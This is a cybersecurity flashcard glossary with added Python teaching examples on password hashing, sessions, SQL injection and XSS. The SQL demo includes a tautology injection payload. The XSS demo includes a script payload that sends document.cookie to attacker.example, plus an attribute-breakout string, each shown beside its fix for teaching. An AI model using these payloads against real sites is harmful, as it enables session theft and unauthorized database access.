Assets, Threats, & Vulnerabilities Flashcards

1
Asset
item perceived as having value to an organization
2
Asset inventory
catalog of assets that need to be protected
3
Asset classification
practice of labeling assets based on sensitivity and importance to an organization
4
Asset management
process of tracking assets and the risks that affect them
5
Compliance
process of adhering to internal standards and external regulations
6
Data
information that is translated, processed, or stored by a computer
7
Data at rest
data not currently being accessed
8
Data in transit
data traveling from one point to another
9
Data in use
data being accessed by one or more users
10
Information security (InfoSec)
practice of keeping data in all states away from unauthorized users
11
National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF)
voluntary framework that consists of standards, guidelines, and best practices to manage cybersecurity risk
12
Policy
set of rules that reduce risk and protect information
13
Procedures
step-by-step instructions to perform a specific security task
14
Regulations
rules set by a government or other authority to control the way something is done
15
Risk
anything that can impact the confidentiality, integrity, or availability of an asset
16
Standards
references that inform how to set policies
17
Threat
any circumstance or event that can negatively impact assets
18
Vulnerability
weakness that can be exploited by a threat
19
Access controls
security controls that manage access, authorization, and accountability of information
20
Algorithm
set of rules used to solve a problem
21
Application programming interface (API) token
small block of signed or encrypted data that carries information about a user and is sent with each API request to prove who is calling
22
Asymmetric encryption
use of a public and private key pair for encryption and decryption of data
23
Basic auth
HTTP authentication scheme in which the client sends the username and password, Base64-encoded, in the Authorization header of every request; because encoding is not encryption, it is only safe over TLS
24
Bit
smallest unit of data measurement on a computer
25
Brute force attack
trial-and-error process of guessing private information, such as a password or key, until the right value is found
26
Cipher
algorithm that encrypts information
27
Cryptographic key
secret value that a cipher uses to encrypt plaintext or decrypt ciphertext
28
Cryptography
process of transforming information into a form that unintended readers can't understand
29
Data custodian
Anyone or anything that's responsible for the safe handling, transport, and storage of information
30
Data owner
person that decides who can access, edit, use, or destroy their information
31
Digital certificate
a file that verifies the identity of a public key holder
32
Encryption
process of converting data from a readable format to an encoded format
33
Hash collision
instance when different inputs produce the same hash value
34
Hash table
data structure that's used to store and reference hash values
35
Hash function
one-way algorithm that maps input of any length to a fixed-length digest; the input can't be recovered from the output
36
Identity and access management (IAM)
collection of processes and technologies that helps organizations manage digital identities in their environment
37
Information privacy
protection against unauthorized access to and distribution of data
38
Multi-factor authentication (MFA)
A security measure that requires a user to verify their identity in two or more ways to access a system or network
39
Non-repudiation
concept that the authenticity of information can't be denied
40
OAuth
open-standard authorization protocol that shares designated access between applications
41
Payment Card Industry Data Security Standards (PCI DSS)
set of security standards formed by major organizations in the financial industry
42
Personally identifiable information (PII)
Any information used to infer an individual's identity
43
Principle of least privilege
concept of granting only the minimal access and authorization required to complete a task or function
44
Protected health information (PHI)
Information that relates to the past, present, or future physical or mental health or condition of an individual
45
Public key infrastructure (PKI)
encryption framework that secures the exchange of online information
46
Rainbow table
file of pre-generated hash values and their associated plaintext
47
Salting
adding a random value to each input before hashing, so identical passwords produce different digests and precomputed tables such as rainbow tables are useless
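The hash function, hash collision, rainbow table, brute force and salting cards describe related ideas that are easiest to see together. This is an added Python example, not part of the original deck: it shows a dictionary lookup cracking an unsalted SHA-256 digest in one step, a salted and iterated password hash (PBKDF2) that the same table cannot touch, and a birthday-style search that finds a collision on a deliberately truncated digest. The wordlist and the "msg-N" inputs are constructed for the demonstration.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for a rainbow table's plaintext column.
WORDLIST = ["123456", "password", "letmein", "qwerty", "hunter2"]

# OWASP's current recommendation for PBKDF2-HMAC-SHA256 is 600,000 iterations.
PBKDF2_ITERATIONS = 600_000


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_rainbow_table(words):
    """Precomputed digest -> plaintext map. A real rainbow table stores chains to
    save space, but the lookup it enables is the same one shown here."""
    return {sha256_hex(w.encode()): w for w in words}


def crack_unsalted(digest_hex: str, table: dict):
    """One lookup recovers the password: same input always gives the same digest."""
    return table.get(digest_hex)


def hash_password(password: str, salt: bytes = None):
    """Salted, iterated hash. The per-user random salt means an attacker would
    need a separate precomputed table per user, which defeats precomputation."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, stored: bytes) -> bool:
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored)   # constant-time comparison


def find_collision(bits: int):
    """Hash collision on a digest truncated to `bits` bits: two different inputs
    with the same output. With 2**bits possible outputs the birthday bound means
    about 2**(bits/2) tries; for full SHA-256 that is ~2**128, i.e. infeasible."""
    seen = {}
    i = 0
    while True:
        msg = f"msg-{i}".encode()
        trunc = sha256_hex(msg)[: bits // 4]    # bits/4 hex chars == `bits` bits
        if trunc in seen and seen[trunc] != msg:
            return seen[trunc], msg
        seen[trunc] = msg
        i += 1


if __name__ == "__main__":
    table = build_rainbow_table(WORDLIST)
    print("unsalted sha256('hunter2') cracks to:", crack_unsalted(sha256_hex(b"hunter2"), table))
    salt, digest = hash_password("hunter2")
    print("salted digest in table?", crack_unsalted(digest.hex(), table))
    a, b = find_collision(16)
    print("16-bit collision:", a, b, sha256_hex(a)[:4])
```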
48
Security assessment
check to determine how resilient current security implementations are against threats
49
Security audit
review of an organization's security controls, policies, and procedures against a set of expectations
50
Security controls
safeguards designed to reduce specific security risks
51
Separation of duties
principle that users should not be given levels of authorization that would allow them to misuse a system
52
Session
sequence of network HTTP requests and responses associated with the same user
53
Session cookie
token that websites use to validate a session and determine how long that session should last
53
Session hijacking
event when attackers obtain a legitimate user's session ID
54
Session ID
unique token that identifies a user and their device while accessing a system
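The session, session cookie, session ID and session hijacking cards describe one mechanism from four angles. This is an added Python example, not code from the original deck: a minimal server-side session store with random IDs and expiry, plus the Set-Cookie attributes that make a stolen ID harder to obtain. The cookie name "sid", the 30-minute TTL and the sample header values are assumptions for the demonstration.

```python
import secrets
import time

SESSION_TTL = 1800   # assumed: 30 minutes before the user must log in again


class SessionStore:
    """Server-side map from session ID -> (user, expiry). The cookie carries only
    the ID; who the user is and what they may do stays on the server."""

    def __init__(self, ttl: int = SESSION_TTL):
        self.ttl = ttl
        self._sessions = {}

    def create(self, user: str, now: float = None) -> str:
        now = time.time() if now is None else now
        # 32 bytes from the OS CSPRNG. A guessable or sequential ID would let an
        # attacker forge a session without stealing one.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = (user, now + self.ttl)
        return sid

    def lookup(self, sid: str, now: float = None):
        """Return the user for a valid session, or None if unknown or expired.
        Whoever presents a valid ID is treated as that user: that is exactly
        what session hijacking exploits, so the TTL bounds the damage window."""
        now = time.time() if now is None else now
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        user, expires = entry
        if now >= expires:
            del self._sessions[sid]          # expired: force re-authentication
            return None
        return user

    def revoke(self, sid: str) -> None:
        """Logout invalidates server-side, so a copied ID stops working too."""
        self._sessions.pop(sid, None)


def set_cookie_header(sid: str, ttl: int = SESSION_TTL) -> str:
    """Set-Cookie value with the attributes that limit hijacking: Secure (sent
    only over TLS), HttpOnly (not readable by page script, so XSS can't lift it),
    SameSite (not attached to cross-site requests)."""
    return f"sid={sid}; Max-Age={ttl}; Path=/; Secure; HttpOnly; SameSite=Lax"


def parse_cookie_header(header: str) -> dict:
    """Parse the client's `Cookie: a=1; b=2` header into a dict."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("alice")
    print(set_cookie_header(sid))
    incoming = parse_cookie_header(f"theme=dark; sid={sid}")
    print("request is from:", store.lookup(incoming["sid"]))
```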
55
Single Sign-On (SSO)
technology that combines several different logins into one
56
Symmetric encryption
use of a single shared secret key for both encryption and decryption of information
57
User provisioning
process of creating and maintaining a user's digital identity
58
Advanced persistent threat (APT)
instance when a threat actor maintains unauthorized access to a system for an extended period of time
59
Attack surface
all the potential vulnerabilities that a threat actor could exploit
60
Attack tree
diagram that maps threats to assets
61
Attack vector
pathways attackers use to penetrate security defenses
62
Bug bounty
Programs that encourage freelance hackers to find and report vulnerabilities
63
Common Vulnerabilities and Exposures (CVE) list
openly accessible dictionary of known vulnerabilities and exposures
64
Common Vulnerability Scoring System (CVSS)
measurement system that scores the severity of a vulnerability
65
CVE Numbering Authority (CNA)
organization that volunteers to analyze and distribute information on eligible CVEs
66
Defense in depth
layered approach to vulnerability management that reduces risk
67
Exploit
way of taking advantage of a vulnerability
68
Exposure
mistake that can be exploited by a threat
69
Hacker
any person who uses computers to gain access to computer systems, networks, or data
70
MITRE
collection of non-profit research and development centers
71
Security hardening
process of strengthening a system to reduce its vulnerability and attack surface
72
Threat actor
any person or group who presents a security risk
74
Vulnerability assessment
internal review process of a company's security systems
75
Vulnerability management
process of finding and patching vulnerabilities
76
Vulnerability scanner
software that automatically compares existing common vulnerabilities and exposures against the technologies on the network
77
Zero-day
vulnerability that is exploited before the vendor knows about it or has released a fix, so defenders have had "zero days" to patch
78
Angler phishing
technique where attackers impersonate customer service reps on social media
80
Adware
type of legitimate software that is sometimes used to display digital advertisements in applications
82
Baiting
social engineering tactic that tempts people into compromising their security
83
Botnet
collection of computers infected by malware that are under the control of a single threat actor, known as the bot-herder
84
Cross-site scripting (XSS)
injection attack that inserts code into a vulnerable website or web application
85
DOM-based XSS attack
instance when client-side script writes attacker-controlled data (for example, from the URL fragment) into the page's DOM; the payload runs entirely in the browser and never reaches the server
86
Cryptojacking
form of malware that installs software to illegally mine cryptocurrencies
87
Dropper
type of malware that comes packed with malicious code which is delivered and installed onto a target system
88
Fileless malware
malware that does not need to be installed by the user because it uses legitimate programs that are already installed to infect a computer
91
Injection attack
Malicious code inserted into a vulnerable application
92
Input validation
programming that validates inputs from users and other programs
93
Intrusion detection system (IDS)
application that monitors system activity and alerts on possible intrusions
94
Loader
type of malware that downloads strains of malicious code from an external source and installs them onto a target system
95
Malware
software designed to harm devices or networks
96
Process of Attack Simulation and Threat Analysis (PASTA)
popular threat modeling framework that's used across many industries
97
Phishing
use of digital communications to trick people into revealing sensitive data or deploying malicious software
98
Phishing kit
collection of software tools needed to launch a phishing campaign
99
Prepared statement
coding technique in which the SQL statement is compiled first and user input is bound to it afterwards as parameters, so the input is never interpreted as SQL
100
Potentially unwanted application (PUA)
type of unwanted software that is bundled in with legitimate programs which might display ads, cause device slowdown, or install other software
101
Quid pro quo
type of baiting used to trick someone into believing that they'll be rewarded in return for sharing access, info, or money
102
Ransomware
type of malicious attack where attackers encrypt an organization's data and demand payment to restore access
103
Reflected XSS attack
instance when malicious script is sent to a server and activated during the server's response
104
Rootkit
malware that provides remote, administrative access to a computer
105
Scareware
Malware that employs tactics to frighten users into infecting their device
106
Smishing
use of text messages to trick users into revealing sensitive info or to impersonate a known source
107
Social engineering
manipulation technique that exploits human error to gain private info, access, or valuables
108
Spear phishing
malicious email attack targeting a specific user or group of users, appearing to originate from a trusted source
109
Spyware
malware that is used to gather and sell info without consent
110
Structured Query Language (SQL)
programming language used to create, interact with, and request info from a database
111
SQL injection
attack in which untrusted input is concatenated into a SQL statement, so the database executes queries the attacker chose rather than the ones the developer wrote
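The injection attack, input validation, prepared statement and SQL injection cards all point at the same defect and fix. This is an added Python example, not code from the original deck: a lookup built by string concatenation beside the same lookup as a prepared statement, run against a constructed in-memory SQLite table so the difference can be observed directly. The table layout, the two sample accounts and the username rule are assumptions for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed sample database: an in-memory users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b")],
    )
    return conn


def find_user_vulnerable(conn, username: str):
    """Untrusted input is pasted into the SQL text, so the database parses
    whatever the attacker typed as part of the query."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn, username: str):
    """Prepared statement: the SQL text is fixed and the value is bound as a
    parameter. The database never treats the input as SQL, whatever it contains."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def is_valid_username(username: str) -> bool:
    """Input validation as a second layer: allowlist the expected shape
    (letters, digits, underscore, 1-32 chars) rather than blocklisting quotes."""
    return 1 <= len(username) <= 32 and username.replace("_", "").isalnum()


# Classic tautology payload: closes the quoted string and makes WHERE always true.
PAYLOAD = "x' OR '1'='1"


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", find_user_vulnerable(conn, PAYLOAD))   # every row comes back
    print("prepared:  ", find_user_safe(conn, PAYLOAD))         # nothing matches
    print("validates? ", is_valid_username(PAYLOAD))
```

Parameter binding is the fix; validation is defence in depth, not a substitute, because a blocklist of quote characters misses encodings and comment tricks the database still understands.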
112
Stored XSS attack
instance when malicious script is injected directly on the server
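The cross-site scripting, reflected XSS and stored XSS cards describe where the script comes from; the fix in both cases is the same and belongs in how the page is rendered. This is an added Python example, not code from the original deck: a handler that reflects a search string into HTML unchanged beside one that output-encodes it for the text and attribute contexts. The payload, the page fragments and the attacker.example host are constructed for the demonstration.

```python
import html

# Constructed attacker input, as it would arrive in a query parameter (reflected
# XSS) or be read back from the database after being saved earlier (stored XSS).
PAYLOAD = '<script>location="https://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(query: str) -> str:
    """Untrusted text dropped straight into the HTML: the browser parses the
    attacker's <script> element as part of the page and runs it."""
    return f"<p>Results for: {query}</p>"


def render_safe(query: str) -> str:
    """Output encoding for the HTML text context: &, <, >, and quotes become
    entities, so the browser displays the payload as literal text."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_attr_safe(query: str) -> str:
    """Attribute context: the value must be quoted AND quotes must be escaped
    (quote=True), or a payload like `" onfocus="alert(1)` breaks out of it."""
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def contains_live_script(page: str) -> bool:
    """Demonstration check only: is a raw <script tag present in the output?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(render_attr_safe('" onfocus="alert(1)'))
```

Server-side encoding does nothing for DOM-based XSS, where the data never passes through the server; there the fix is in the client code (assign to textContent instead of innerHTML, and treat location.hash as untrusted).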
113
Tailgating
social engineering tactic in which unauthorized people follow an authorized person into a restricted area
116
Threat modeling
process of identifying assets, their vulnerabilities, and how each is exposed to threats
117
Trojan horse
malware that looks like a legitimate file or program
118
Vishing
exploitation of electronic voice communication to obtain sensitive info or to impersonate a known source
119
Watering hole attack
type of attack when a threat actor compromises a website frequently visited by a specific group of users
120
Whaling
category of spear phishing attempts that are aimed at high-ranking executives in an organization
121
Web-based exploits
malicious code or behavior that's used to take advantage of coding flaws in a web application